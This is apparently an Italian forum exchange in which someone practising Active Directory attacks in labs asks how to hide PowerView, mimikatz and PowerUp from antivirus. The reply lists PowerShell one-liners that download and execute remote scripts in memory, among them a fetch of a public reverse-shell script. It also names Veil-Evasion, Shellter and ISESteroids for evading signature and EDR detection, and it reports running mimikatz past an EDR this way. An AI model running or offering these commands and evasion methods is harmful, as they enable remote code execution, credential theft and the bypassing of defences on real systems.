Una tecnica per gli script powershell è quella di eseguirli senza salvarli su disco tramite la funzione iex, quindi facendo qual cosa del tipoBuonasera a tutti,
Sto facendo diverse prove per migliorare le mie skills nella AD sia usando lab tryhackme o creandomene uno da solo. Volevo chiedere una cosa. C'è un modo per "masherare" tool come Powerview o mimikatz o PowerUp in modo tale che AV non rilevi nulla?
Il bypassing AMSI quando questi tool vengono avviati l'ho risolto ma il problema resta se ad esempio da Github faccio un clone di questi tool sul locale che subito AV me li vede come malware.
Grazie in anticipo
Bash:
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
Per i binari puoi provare a usare veilevasion oppure shellter per provare a ingannare il riconoscimento tramite signature.
Per offuscare gli script powershell puoi usare anche ISESteroids, io l'ho usato per bypassare i controlli di un EDR e far girare mimikatz